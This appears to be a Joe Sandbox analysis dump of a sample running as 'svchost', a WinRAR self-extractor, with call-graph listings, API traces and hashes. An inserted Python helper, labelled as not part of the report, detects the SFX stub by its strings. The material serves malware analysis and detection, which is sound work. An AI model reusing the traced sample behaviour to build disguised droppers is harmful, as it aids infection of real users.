24773->24774 24774->24762 24776 84da5c __EH_prolog 24775->24776 24877 840659 24776->24877 24778 84da8d 24881 835b3d 24778->24881 24780 84daab 24885 837b0d 24780->24885 24784 84dafe 24901 837b9e 24784->24901 24786 84bdee 24786->24716 24788 84d6a8 24787->24788 24789 84a5c6 4 API calls 24788->24789 24790 84d6ad 24789->24790 24791 84d6b5 GetWindow 24790->24791 24792 84bf15 24790->24792 24791->24792 24795 84d6d5 24791->24795 24792->24566 24792->24567 24793 84d6e2 GetClassNameW 25349 841fbb CompareStringW 24793->25349 24795->24792 24795->24793 24796 84d706 GetWindowLongW 24795->24796 24797 84d76a GetWindow 24795->24797 24796->24797 24798 84d716 SendMessageW 24796->24798 24797->24792 24797->24795 24798->24797 24799 84d72c GetObjectW 24798->24799 25350 84a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24799->25350 24801 84d743 25351 84a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24801->25351 25352 84a80c 8 API calls 24801->25352 24804 84d754 SendMessageW DeleteObject 24804->24797 24805->24582 24807 84abf1 24806->24807 24808 84abcc 24806->24808 24810 84abf6 SHAutoComplete 24807->24810 24811 84abff 24807->24811 25353 841fbb CompareStringW 24808->25353 24810->24811 24814 84b093 24811->24814 24812 84abdf 24812->24807 24813 84abe3 FindWindowExW 24812->24813 24813->24807 24815 84b09d __EH_prolog 24814->24815 24816 8313dc 84 API calls 24815->24816 24817 84b0bf 24816->24817 25354 831fdc 24817->25354 24820 84b0d9 24822 831692 86 API calls 24820->24822 24821 84b0eb 24823 8319af 128 API calls 24821->24823 24824 84b0e4 24822->24824 24826 84b10d __InternalCxxFrameHandler ___std_exception_copy 24823->24826 24824->24606 24824->24608 24825 831692 86 API calls 24825->24824 24826->24825 24827->24651 24829 84b568 5 API calls 24828->24829 24830 84d4e0 GetDlgItem 24829->24830 24831 84d536 SendMessageW SendMessageW 24830->24831 24832 84d502 24830->24832 24833 84d591 SendMessageW SendMessageW SendMessageW 24831->24833 24834 84d572 24831->24834 24835 84d50d ShowWindow SendMessageW 
SendMessageW 24832->24835 24836 84d5c4 SendMessageW 24833->24836 24837 84d5e7 SendMessageW 24833->24837 24834->24833 24835->24831 24836->24837 24837->24609 24838->24670 24839->24697 24840->24702 24841->24707 24842->24711 24843->24720 24844->24663 24845->24669 24846->24640 24847->24627 24848->24728 24849->24726 24851 83a2bf 24850->24851 24852 83a2e3 24851->24852 24853 83a2d6 CreateDirectoryW 24851->24853 24854 83a231 3 API calls 24852->24854 24853->24852 24855 83a316 24853->24855 24856 83a2e9 24854->24856 24857 83a325 24855->24857 24863 83a4ed 24855->24863 24858 83a329 GetLastError 24856->24858 24860 83bb03 GetCurrentDirectoryW 24856->24860 24857->24735 24858->24857 24861 83a2ff 24860->24861 24861->24858 24862 83a303 CreateDirectoryW 24861->24862 24862->24855 24862->24858 24864 84ec50 24863->24864 24865 83a4fa SetFileAttributesW 24864->24865 24866 83a510 24865->24866 24867 83a53d 24865->24867 24868 83bb03 GetCurrentDirectoryW 24866->24868 24867->24857 24869 83a524 24868->24869 24869->24867 24870 83a528 SetFileAttributesW 24869->24870 24870->24867 24871->24762 24872->24762 24873->24764 24874->24762 24875->24762 24876->24762 24878 840666 _wcslen 24877->24878 24905 8317e9 24878->24905 24880 84067e 24880->24778 24882 840659 _wcslen 24881->24882 24883 8317e9 78 API calls 24882->24883 24884 84067e 24883->24884 24884->24780 24886 837b17 __EH_prolog 24885->24886 24922 83ce40 24886->24922 24888 837b32 24889 84eb38 8 API calls 24888->24889 24891 837b5c 24889->24891 24928 844a76 24891->24928 24893 837c7d 24894 837c87 24893->24894 24896 837cf1 24894->24896 24957 83a56d 24894->24957 24897 837d50 24896->24897 24935 838284 24896->24935 24900 837d92 24897->24900 24963 83138b 74 API calls 24897->24963 24900->24784 24902 837bac 24901->24902 24904 837bb3 24901->24904 24903 842297 86 API calls 24902->24903 24903->24904 24906 8317ff 24905->24906 24917 83185a __InternalCxxFrameHandler 24905->24917 24907 831828 24906->24907 24918 836c36 76 API calls __vswprintf_c_l 24906->24918 24909 
831887 24907->24909 24910 831847 ___std_exception_copy 24907->24910 24912 853e3e 22 API calls 24909->24912 24910->24917 24920 836ca7 75 API calls 24910->24920 24911 83181e 24919 836ca7 75 API calls 24911->24919 24914 83188e 24912->24914 24914->24917 24921 836ca7 75 API calls 24914->24921 24917->24880 24918->24911 24919->24907 24920->24917 24921->24917 24923 83ce4a __EH_prolog 24922->24923 24924 84eb38 8 API calls 24923->24924 24926 83ce8d 24924->24926 24925 84eb38 8 API calls 24927 83ceb1 24925->24927 24926->24925 24927->24888 24929 844a80 __EH_prolog 24928->24929 24930 84eb38 8 API calls 24929->24930 24931 844a9c 24930->24931 24932 837b8b 24931->24932 24934 840e46 80 API calls 24931->24934 24932->24893 24934->24932 24936 83828e __EH_prolog 24935->24936 24964 8313dc 24936->24964 24938 8382aa 24939 8382bb 24938->24939 25104 839f42 24938->25104 24942 8382f2 24939->24942 24972 831a04 24939->24972 25100 831692 24942->25100 24945 838389 24991 838430 24945->24991 24948 8383e8 24996 831f6d 24948->24996 24952 8382ee 24952->24942 24952->24945 24955 83a56d 7 API calls 24952->24955 25108 83c0c5 CompareStringW _wcslen 24952->25108 24953 8383f3 24953->24942 25000 833b2d 24953->25000 25012 83848e 24953->25012 24955->24952 24958 83a582 24957->24958 24959 83a5b0 24958->24959 25338 83a69b 24958->25338 24959->24894 24961 83a592 24961->24959 24962 83a597 FindClose 24961->24962 24962->24959 24963->24900 24965 8313e1 __EH_prolog 24964->24965 24966 83ce40 8 API calls 24965->24966 24967 831419 24966->24967 24968 84eb38 8 API calls 24967->24968 24971 831474 __cftof 24967->24971 24969 831461 24968->24969 24970 83b505 84 API calls 24969->24970 24969->24971 24970->24971 24971->24938 24973 831a0e __EH_prolog 24972->24973 24985 831a61 24973->24985 24988 831b9b 24973->24988 25110 8313ba 24973->25110 24976 831bc7 25113 83138b 74 API calls 24976->25113 24978 833b2d 101 API calls 24981 831c12 24978->24981 24979 831bd4 24979->24978 24979->24988 24980 831c5a 24984 831c8d 24980->24984 24980->24988 
25114 83138b 74 API calls 24980->25114 24981->24980 24983 833b2d 101 API calls 24981->24983 24983->24981 24984->24988 24989 839e80 79 API calls 24984->24989 24985->24976 24985->24979 24985->24988 24986 833b2d 101 API calls 24987 831cde 24986->24987 24987->24986 24987->24988 24988->24952 24989->24987 24990 839e80 79 API calls 24990->24985 25132 83cf3d 24991->25132 24993 838440 25136 8413d2 GetSystemTime SystemTimeToFileTime 24993->25136 24995 8383a3 24995->24948 25109 841b66 72 API calls 24995->25109 24997 831f72 __EH_prolog 24996->24997 24999 831fa6 24997->24999 25141 8319af 24997->25141 24999->24953 25001 833b39 25000->25001 25002 833b3d 25000->25002 25001->24953 25011 839e80 79 API calls 25002->25011 25003 833b4f 25004 833b6a 25003->25004 25005 833b78 25003->25005 25006 833baa 25004->25006 25271 8332f7 89 API calls 2 library calls 25004->25271 25272 83286b 101 API calls 3 library calls 25005->25272 25006->24953 25009 833b76 25009->25006 25273 8320d7 74 API calls 25009->25273 25011->25003 25013 838498 __EH_prolog 25012->25013 25018 8384d5 25013->25018 25027 838513 25013->25027 25298 848c8d 103 API calls 25013->25298 25014 8384f5 25016 8384fa 25014->25016 25017 83851c 25014->25017 25016->25027 25299 837a0d 152 API calls 25016->25299 25017->25027 25300 848c8d 103 API calls 25017->25300 25018->25014 25020 83857a 25018->25020 25018->25027 25020->25027 25274 835d1a 25020->25274 25023 838605 25023->25027 25280 838167 25023->25280 25026 838797 25028 83a56d 7 API calls 25026->25028 25029 838802 25026->25029 25027->24953 25028->25029 25286 837c0d 25029->25286 25031 83d051 82 API calls 25037 83885d 25031->25037 25032 83898b 25303 832021 74 API calls 25032->25303 25033 838a5f 25038 838ab6 25033->25038 25050 838a6a 25033->25050 25034 838992 25034->25033 25040 8389e1 25034->25040 25037->25027 25037->25031 25037->25032 25037->25034 25301 838117 84 API calls 25037->25301 25302 832021 74 API calls 25037->25302 25045 838a4c 25038->25045 25306 837fc0 97 API calls 25038->25306 25039 
838b14 25046 838b82 25039->25046 25089 839105 25039->25089 25307 8398bc 25039->25307 25040->25039 25044 83a231 3 API calls 25040->25044 25040->25045 25042 83959a 80 API calls 25042->25027 25043 83959a 80 API calls 25043->25027 25047 838a19 25044->25047 25045->25039 25057 838ab4 25045->25057 25048 83ab1a 8 API calls 25046->25048 25047->25045 25304 8392a3 97 API calls 25047->25304 25051 838bd1 25048->25051 25050->25057 25305 837db2 101 API calls 25050->25305 25053 83ab1a 8 API calls 25051->25053 25072 838be7 25053->25072 25057->25043 25058 838b70 25311 836e98 77 API calls 25058->25311 25060 838e40 25065 838e52 25060->25065 25066 838e66 25060->25066 25085 838d49 25060->25085 25061 838d18 25063 838d8a 25061->25063 25064 838d28 25061->25064 25062 838cbc 25062->25060 25062->25061 25070 838167 19 API calls 25063->25070 25067 838d6e 25064->25067 25075 838d37 25064->25075 25068 839215 123 API calls 25065->25068 25069 843377 75 API calls 25066->25069 25067->25085 25314 8377b8 111 API calls 25067->25314 25068->25085 25071 838e7f 25069->25071 25076 838dbd 25070->25076 25317 843020 123 API calls 25071->25317 25072->25062 25073 838c93 25072->25073 25079 83981a 79 API calls 25072->25079 25073->25062 25312 839a3c 82 API calls 25073->25312 25313 832021 74 API calls 25075->25313 25081 838de6 25076->25081 25082 838df5 25076->25082 25076->25085 25079->25073 25315 837542 85 API calls 25081->25315 25316 839155 93 API calls __EH_prolog 25082->25316 25088 838f85 25085->25088 25318 832021 74 API calls 25085->25318 25087 839090 25087->25089 25091 83a4ed 3 API calls 25087->25091 25088->25087 25088->25089 25090 83903e 25088->25090 25292 839f09 SetEndOfFile 25088->25292 25089->25042 25293 839da2 25090->25293 25092 8390eb 25091->25092 25092->25089 25319 832021 74 API calls 25092->25319 25095 839085 25097 839620 77 API calls 25095->25097 25097->25087 25098 8390fb 25320 836dcb 76 API calls 25098->25320 25101 8316a4 25100->25101 25336 83cee1 86 API calls 25101->25336 25105 839f59 25104->25105 
25106 839f63 25105->25106 25337 836d0c 78 API calls 25105->25337 25106->24939 25108->24952 25109->24948 25115 831732 25110->25115 25112 8313d6 25112->24990 25113->24988 25114->24984 25116 831748 25115->25116 25126 8317a0 __InternalCxxFrameHandler 25115->25126 25117 831771 25116->25117 25128 836c36 76 API calls __vswprintf_c_l 25116->25128 25119 8317c7 25117->25119 25124 83178d ___std_exception_copy 25117->25124 25121 853e3e 22 API calls 25119->25121 25120 831767 25129 836ca7 75 API calls 25120->25129 25123 8317ce 25121->25123 25123->25126 25131 836ca7 75 API calls 25123->25131 25124->25126 25130 836ca7 75 API calls 25124->25130 25126->25112 25128->25120 25129->25117 25130->25126 25131->25126 25133 83cf4d 25132->25133 25135 83cf54 25132->25135 25137 83981a 25133->25137 25135->24993 25136->24995 25138 839833 25137->25138 25140 839e80 79 API calls 25138->25140 25139 839865 25139->25135 25140->25139 25142 8319bf 25141->25142 25144 8319bb 25141->25144 25145 8318f6 25142->25145 25144->24999 25146 831908 25145->25146 25147 831945 25145->25147 25148 833b2d 101 API calls 25146->25148 25153 833fa3 25147->25153 25150 831928 25148->25150 25150->25144 25155 833fac 25153->25155 25154 833b2d 101 API calls 25154->25155 25155->25154 25157 831966 25155->25157 25170 840e08 25155->25170 25157->25150 25158 831e50 25157->25158 25159 831e5a __EH_prolog 25158->25159 25178 833bba 25159->25178 25161 831e84 25162 831732 78 API calls 25161->25162 25165 831f0b 25161->25165 25163 831e9b 25162->25163 25206 8318a9 78 API calls 25163->25206 25165->25150 25166 831eb3 25168 831ebf _wcslen 25166->25168 25207 841b84 MultiByteToWideChar 25166->25207 25208 8318a9 78 API calls 25168->25208 25171 840e0f 25170->25171 25172 840e2a 25171->25172 25176 836c31 RaiseException CallUnexpected 25171->25176 25174 840e3b SetThreadExecutionState 25172->25174 25177 836c31 RaiseException CallUnexpected 25172->25177 25174->25155 25176->25172 25177->25174 25179 833bc4 __EH_prolog 25178->25179 25180 833bf6 25179->25180 
25181 833bda 25179->25181 25182 833e51 25180->25182 25186 833c22 25180->25186 25234 83138b 74 API calls 25181->25234 25251 83138b 74 API calls 25182->25251 25185 833be5 25185->25161 25186->25185 25209 843377 25186->25209 25188 833ca3 25189 833d2e 25188->25189 25205 833c9a 25188->25205 25237 83d051 25188->25237 25219 83ab1a 25189->25219 25190 833c9f 25190->25188 25236 8320bd 78 API calls 25190->25236 25192 833c71 25192->25188 25192->25190 25193 833c8f 25192->25193 25235 83138b 74 API calls 25193->25235 25198 833d41 25199 833dd7 25198->25199 25200 833dc7 25198->25200 25243 843020 123 API calls 25199->25243 25223 839215 25200->25223 25203 833dd5 25203->25205 25244 832021 74 API calls 25203->25244 25245 842297 25205->25245 25206->25166 25207->25168 25208->25165 25210 84338c 25209->25210 25213 843396 ___std_exception_copy 25209->25213 25252 836ca7 75 API calls 25210->25252 25212 8434c6 25254 85238d RaiseException 25212->25254 25213->25212 25214 84341c 25213->25214 25218 843440 __cftof 25213->25218 25253 8432aa 75 API calls 3 library calls 25214->25253 25217 8434f2 25218->25192 25220 83ab32 25219->25220 25221 83ab28 25219->25221 25220->25198 25222 84eb38 8 API calls 25221->25222 25222->25220 25224 83921f __EH_prolog 25223->25224 25255 837c64 25224->25255 25227 8313ba 78 API calls 25228 839231 25227->25228 25258 83d114 25228->25258 25230 839243 25232 83d114 118 API calls 25230->25232 25233 83928a 25230->25233 25267 83d300 97 API calls __InternalCxxFrameHandler 25230->25267 25232->25230 25233->25203 25234->25185 25235->25205 25236->25188 25238 83d072 25237->25238 25239 83d084 25237->25239 25268 83603a 82 API calls 25238->25268 25269 83603a 82 API calls 25239->25269 25242 83d07c 25242->25189 25243->25203 25244->25205 25247 8422a1 25245->25247 25246 8422ba 25270 840eed 86 API calls 25246->25270 25247->25246 25250 8422ce 25247->25250 25249 8422c1 25249->25250 25251->25185 25252->25213 25253->25218 25254->25217 25256 83b146 GetVersionExW 25255->25256 25257 837c69 25256->25257 
Control-flow graph (interactive node/edge data not reproduced). Win32 APIs named in the graph nodes of this span: SetThreadExecutionState, RaiseException, CharUpperW, CompareStringW, FlushFileBuffers, SetFileTime, GetFileType, FindFirstFileW, FindNextFileW, FindClose, GetLastError, SetLastError, GetCurrentDirectoryW, GetFullPathNameW, GetClientRect, GetCommandLineA, GetCommandLineW, FreeLibrary, LoadLibraryExW, GetProcAddress, TlsAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GdipDisposeImage, GdipFree, GdipCloneImage, GdipAlloc, QueryPerformanceFrequency, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, TerminateProcess, LocalFree, GetProcessHeap, RtlAllocateHeap, RtlFreeHeap, HeapReAlloc, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, LCMapStringW, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, CloseHandle, SetWindowTextW, GetDlgItem, SendMessageW, ShowWindow, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, MoveFileExW, ShellExecuteExW, GetExitCodeProcess, ExpandEnvironmentStringsW, SetFilePointer, GetStdHandle, WriteFile.
CRT helpers named in the nodes: __InternalCxxFrameHandler, ___vcrt_InitializeCriticalSectionEx, _wcslen, _wcsrchr, _swprintf, __vsnwprintf_l, __RTC_Initialize, ___security_init_cookie, ___scrt_uninitialize_crt, ___scrt_is_nonwritable_in_current_image, ___delayLoadHelper2@8, CatchGuardHandler, _abort, _free, _unexpected, __cftof, std::bad_exception::bad_exception, __EH_prolog.

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00840863: GetModuleHandleW.KERNEL32(kernel32), ref: 0084087C
                                                              • Part of subcall function 00840863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0084088E
                                                              • Part of subcall function 00840863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008408BF
                                                              • Part of subcall function 0084A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0084A655
                                                              • Part of subcall function 0084AC16: OleInitialize.OLE32(00000000), ref: 0084AC2F
                                                              • Part of subcall function 0084AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0084AC66
                                                              • Part of subcall function 0084AC16: SHGetMalloc.SHELL32(00878438), ref: 0084AC70
                                                            • GetCommandLineW.KERNEL32 ref: 0084DF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0084DF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0084DF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0084DFCE
                                                              • Part of subcall function 0084DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0084DBF4
                                                              • Part of subcall function 0084DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084DC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 0084DFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0088EC90,00000800), ref: 0084DFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0088EC90), ref: 0084DFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 0084E009
                                                            • _swprintf.LIBCMT ref: 0084E048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0084E05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0084E061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 0084E078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0084E0C9
                                                            • Sleep.KERNEL32(?), ref: 0084E0F7
                                                            • DeleteObject.GDI32 ref: 0084E130
                                                            • DeleteObject.GDI32(?), ref: 0084E140
                                                            • CloseHandle.KERNEL32 ref: 0084E183
                                                            Memory Dump Source
                                                              • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                              • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-277078469
                                                            • Opcode ID: 5c142dcfd67535695e62edf26bb499c02d20d19c829813e79bb387861a4a170a
                                                            • Instruction ID: 7eaab640536e5648fcb6f2c391d0498b2de8578f365ed44814c28271fe0bc1e3
                                                            • Opcode Fuzzy Hash: 5c142dcfd67535695e62edf26bb499c02d20d19c829813e79bb387861a4a170a
                                                            • Instruction Fuzzy Hash: 9D61F571944349AFD320ABB8EC4DF2B37ADFB45741F04042AF949D2292DBB8D948C762
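The API record above is the startup path of a WinRAR self-extracting (SFX) module: it opens the winrarsfxmappingfile.tmp mapping, exports the SFX command and parameters through the sfxcmd and sfxpar environment variables, records its own path and start time in sfxname and sfxstime, and shows the STARTDLG dialog. For triage, those literal string arguments are the quickest way to recognise the SFX stub in a memory dump or dropped file, so the analyst spends time on the embedded payload and the SFX script rather than on WinRAR's own code. The following Python is an added example and is not part of the Joe Sandbox report or of the analysed sample. It parses lines in this report's APIs format, collects the literal string arguments, and searches a byte buffer for them as UTF-16LE, which is how the W-suffixed APIs receive them. The SAMPLE_IMAGE buffer is constructed for the demonstration and is not a real PE; the WINRAR_SFX_MARKERS set and the three-hit threshold are assumptions made here, not something the report states.

```python
"""Triage helper for Joe Sandbox 'APIs' records (added example, see lead-in)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed input: lines copied from the API record of the SFX startup function.
REPORT_API_LINES = """
• GetCommandLineW.KERNEL32 ref: 0084DF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0084DF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0084DF94
• Part of subcall function 0084DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0084DBF4
• Part of subcall function 0084DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084DC30
• GetModuleFileNameW.KERNEL32(00000000,0088EC90,00000800), ref: 0084DFF2
• SetEnvironmentVariableW.KERNEL32(sfxname,0088EC90), ref: 0084DFFE
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0084E05A
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0084E0C9
• FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0084B73D,00000066), ref: 0084A6D5
"""

# One bullet line: optional "Part of subcall function <addr>:", Api.MODULE(args), ref: <addr>
_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX_ARG = re.compile(r"-?[0-9A-Fa-f]{8}")  # 32-bit value or pointer as the report prints it


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                              # address of the call site
    args: List[str] = field(default_factory=list)
    subcall: Optional[int] = None         # set when the line is "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of a Joe Sandbox APIs record; lines that do not match are skipped."""
    calls = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], int(m["ref"], 16), args, sub))
    return calls


def classify_arg(arg: str) -> str:
    """'unknown' for '?', 'hex' for an 8-digit value, 'symbol' for Function_xxxx, else 'string'."""
    if arg == "?":
        return "unknown"
    if _HEX_ARG.fullmatch(arg):
        return "hex"
    if arg.startswith("Function_"):
        return "symbol"
    return "string"


def string_arguments(calls: List[ApiCall]) -> Set[str]:
    """Literal string arguments the sandbox resolved (env-var names, mapping name, dialog template)."""
    return {a for c in calls for a in c.args if classify_arg(a) == "string"}


def find_wide_strings(image: bytes, needles: Set[str]) -> Dict[str, int]:
    """First offset of each needle encoded as UTF-16LE, the encoding W-suffixed APIs take."""
    hits = {}
    for s in sorted(needles):
        off = image.find(s.encode("utf-16-le"))
        if off != -1:
            hits[s] = off
    return hits


# Assumed marker set: the strings this report attributes to the SFX stub's startup path.
WINRAR_SFX_MARKERS = {"winrarsfxmappingfile.tmp", "sfxcmd", "sfxpar",
                      "sfxname", "sfxstime", "STARTDLG"}


def is_winrar_sfx_stub(hits: Dict[str, int], threshold: int = 3) -> bool:
    """Heuristic (assumed threshold): enough markers present to treat the image as an SFX stub."""
    return len(WINRAR_SFX_MARKERS & set(hits)) >= threshold


def _wide(s: str) -> bytes:
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-in for a dumped module: not a real PE, only markers between padding bytes.
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62                 # bytes 0..63
    + _wide("winrarsfxmappingfile.tmp")  # starts at offset 64
    + b"\x90" * 16
    + _wide("sfxcmd")                    # starts at offset 130
    + _wide("sfxname")                   # starts at offset 144
    + b"\xcc" * 8
    + _wide("STARTDLG")                  # starts at offset 168
)

if __name__ == "__main__":
    calls = parse_api_lines(REPORT_API_LINES)
    hits = find_wide_strings(SAMPLE_IMAGE, string_arguments(calls))
    for name, off in hits.items():
        print(f"{off:#010x} {name}")
    print("WinRAR SFX stub:", is_winrar_sfx_stub(hits))
```

A positive result only says the container is a WinRAR SFX stub, which is benign code on its own; the sample's behaviour lives in the archived payload and in the SFX script that sfxcmd and sfxpar expose, so detection and reporting should be keyed on those, not on the stub.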

                                                            Control-flow Graph

                                                            control_flow_graph 812 84a6c2-84a6df FindResourceW 813 84a6e5-84a6f6 SizeofResource 812->813 814 84a7db 812->814 813->814 815 84a6fc-84a70b LoadResource 813->815 816 84a7dd-84a7e1 814->816 815->814 817 84a711-84a71c LockResource 815->817 817->814 818 84a722-84a737 GlobalAlloc 817->818 819 84a7d3-84a7d9 818->819 820 84a73d-84a746 GlobalLock 818->820 819->816 821 84a7cc-84a7cd GlobalFree 820->821 822 84a74c-84a76a call 850320 CreateStreamOnHGlobal 820->822 821->819 825 84a7c5-84a7c6 GlobalUnlock 822->825 826 84a76c-84a78e call 84a626 822->826 825->821 826->825 831 84a790-84a798 826->831 832 84a7b3-84a7c1 831->832 833 84a79a-84a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 84a7b0 833->834 834->832
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0084B73D,00000066), ref: 0084A6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A703
                                                            • LockResource.KERNEL32(00000000,?,?,?,0084B73D,00000066), ref: 0084A712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0084B73D,00000066), ref: 0084A72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0084A73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0084A762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0084A7C6
                                                              • Part of subcall function 0084A626: GdipAlloc.GDIPLUS(00000010), ref: 0084A62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0084A7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 0084A7CD
                                                            Memory Dump Source
                                                              • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                              • Associated dumps: same set as listed for the first function above (00830000, 00863000, 0086E000, 00875000, 00892000, 00893000)
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: PNG
                                                            • API String ID: 211097158-364855578
                                                            • Opcode ID: 5761299fdee8f27319ed44ac0347e5ace421822fd2969c46b46565e97a48a9b5
                                                            • Instruction ID: 1f68cba2f11de03e5ac723f0be5acccbc7b480de34c54f7f16ca5227d69ac1d7
                                                            • Opcode Fuzzy Hash: 5761299fdee8f27319ed44ac0347e5ace421822fd2969c46b46565e97a48a9b5
                                                            • Instruction Fuzzy Hash: 0031C27560070AAFD7249F21EC89D2B7BB9FF85760B050519F845D6620EB71DC84CAA2

                                                            Control-flow Graph

                                                            control_flow_graph 1025 83a69b-83a6bf call 84ec50 1028 83a6c1-83a6ce FindFirstFileW 1025->1028 1029 83a727-83a730 FindNextFileW 1025->1029 1030 83a742-83a7ff call 840602 call 83c310 call 8415da * 3 1028->1030 1032 83a6d0-83a6e2 call 83bb03 1028->1032 1029->1030 1031 83a732-83a740 GetLastError 1029->1031 1037 83a804-83a811 1030->1037 1033 83a719-83a722 1031->1033 1039 83a6e4-83a6fc FindFirstFileW 1032->1039 1040 83a6fe-83a707 GetLastError 1032->1040 1033->1037 1039->1030 1039->1040 1042 83a717 1040->1042 1043 83a709-83a70c 1040->1043 1042->1033 1043->1042 1045 83a70e-83a711 1043->1045 1045->1042 1048 83a713-83a715 1045->1048 1048->1033
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6C4
                                                              • Part of subcall function 0083BB03: _wcslen.LIBCMT ref: 0083BB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,0083A592,000000FF,?,?), ref: 0083A728
                                                            • GetLastError.KERNEL32(?,?,?,?,0083A592,000000FF,?,?), ref: 0083A734
                                                            Memory Dump Source
                                                              • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                              • Associated dumps: same set as listed for the first function above (00830000, 00863000, 0086E000, 00875000, 00892000, 00893000)
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
